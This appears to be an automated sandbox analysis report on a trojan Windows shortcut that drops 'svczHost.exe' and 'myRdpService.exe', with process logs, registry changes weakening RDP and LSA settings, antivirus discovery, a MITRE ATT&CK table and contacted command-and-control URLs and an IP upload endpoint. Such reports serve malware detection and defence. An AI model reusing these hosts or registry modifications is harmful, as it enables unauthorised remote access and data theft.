Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation

Source: C:\Windows\Temp\svczHost.exe

Code function: 18_2_00007FF79C370CE4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

18_2_00007FF79C370CE4

Source: C:\Windows\Temp\myRdpService.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies security policies related information

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin

Source: powershell.exe, 00000002.00000002.24582640952.0000026A24C90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :Sat, 05 Aug 2023 21:04:58 GMTr\MsMpeng.exe
Source: powershell.exe, 00000002.00000002.24575988850.00000262233C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25884234697.000001FA343B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: powershell.exe, 00000009.00000002.25884234697.000001FA34426000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

Remote Access Functionality

Allows multiple concurrent remote connection

Source: C:\Windows\Temp\myRdpService.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	541 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	11 Windows Service	11 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	11 Process Injection	1 Obfuscated Files or Information	Security Account Manager	136 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	5 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	551 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	11 Process Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	361 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	361 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Users	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ny.lnk.d.lnk	34%	ReversingLabs	Shortcut.Trojan.Pantera

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Temp\svczHost.exe	8%	ReversingLabs

Source	Detection	Scanner	Label
http://html4/loose.dtd	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/50deddaea4c9b7d61413b0607c29d217fb59374de9f6370902e888f276715c81f7bdb	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngXz9	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/7d6447df5c20714d580dd15f64b91ad8692b42994877a271f4ee11afcc798d63f96e3	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83b41f7dfeb496619cfd7d1f90769f1ff5	0%	Avira URL Cloud	safe
https://akademiiiiiiii.online/t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351Xz9	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/897605e002d48fed977a6a5b9d4706b7bbd31df6c8a9bfd969709d2e0e4b69df4f41c2d72b187c25b9e6b90cbad4ddc4	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595d	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/7dfed9d6c790d0068121e3be7e2647c45f0e8b505415e6d80e64e63c4ebab118a2e4b	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/7a0e36d8452d554476938e30cd0496a9a4562d83c7a848fbe65b7f7e919bbd3acf746	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/api/registry/upload/11b46eb9cdd81ad4c5875367ee4c05e4	0%	Avira URL Cloud	safe
http://www.microsoft.coB	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d836a933a4	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83b41f7df	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/6f5b28f567618bb7b48dc18a2b5751f5791a04bac2764be3c8ead50796e3f23dacb85	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/7	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/api/registry/upload/11b46eb9cdd81ad4c5875367ee4c05e4pv%	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/897605e002d48fed977a6a5b9d4706b7bbd31df6c8a9bfd969709d2e0e4b69df4f41c	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/api/registry	0%	Avira URL Cloud	safe
http://schemas.o	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
http://akademiiiiiiii.XZ	0%	Avira URL Cloud	safe
https://.VisualCQ	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngh	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c	0%	Avira URL Cloud	safe
http://schemas.openxmlformatCK	0%	Avira URL Cloud	safe
http://schemas.openxmlformats.SJm	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d835daa8b68ca03e3a6e91f8afeb39805d8	0%	Avira URL Cloud	safe
http://23.88.71.29:8000/client/ws	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/7dfed9d6c790d0068121e3be7e2647c45f0e8b505415e6d80e64e63c4ebab118a2e4b6b4f36140f511645c3d908de349	0%	Avira URL Cloud	safe
https://akademiiiiiiii.online	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c58e5a27974bb20ec802124be99a	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d836a933a49096f87bb408aa2e2d2d69dbf	0%	Avira URL Cloud	safe
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d835daa8b6	0%	Avira URL Cloud	safe
https://akademiiiiiiii.online/t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351	0%	Avira URL Cloud	safe
https://oneget.org	0%	Avira URL Cloud	safe
http://crl.microsoft.c	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
akademiiiiiiii.online	104.21.93.157	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://akademiiiiiiii.online/t/897605e002d48fed977a6a5b9d4706b7bbd31df6c8a9bfd969709d2e0e4b69df4f41c2d72b187c25b9e6b90cbad4ddc4	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83b41f7dfeb496619cfd7d1f90769f1ff5	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/api/registry/upload/11b46eb9cdd81ad4c5875367ee4c05e4	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/api/registry	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d835daa8b68ca03e3a6e91f8afeb39805d8	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/client/ws	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/t/7dfed9d6c790d0068121e3be7e2647c45f0e8b505415e6d80e64e63c4ebab118a2e4b6b4f36140f511645c3d908de349	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c58e5a27974bb20ec802124be99a	false	Avira URL Cloud: safe	unknown
https://akademiiiiiiii.online/t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d836a933a49096f87bb408aa2e2d2d69dbf	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.pngXz9	powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/t/50deddaea4c9b7d61413b0607c29d217fb59374de9f6370902e888f276715c81f7bdb	powershell.exe, 00000009.00000002.25579447152.000001FA1C23C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-c	svczHost.exe, myRdpService.exe	false		high
http://akademiiiiiiii.online/t/7d6447df5c20714d580dd15f64b91ad8692b42994877a271f4ee11afcc798d63f96e3	powershell.exe, 00000002.00000002.24493746588.000002620BF60000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000002.00000002.24583233213.0000026A24D3D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	false		high
https://akademiiiiiiii.online/t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351Xz9	powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.css	svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://23.88.71.29:8000/	myRdpService.exe, 00000023.00000002.25567154956.000001C9E81BF000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000002.25567154956.000001C9E81AE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/t/46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36	svczHost.exe, 00000012.00000002.25194511083.0000024F77D0D000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25194511083.0000024F77D61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/t/7dfed9d6c790d0068121e3be7e2647c45f0e8b505415e6d80e64e63c4ebab118a2e4b	powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://akademiiiiiiii.online/t/7a0e36d8452d554476938e30cd0496a9a4562d83c7a848fbe65b7f7e919bbd3acf746	powershell.exe, 00000009.00000002.25579447152.000001FA1C23C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
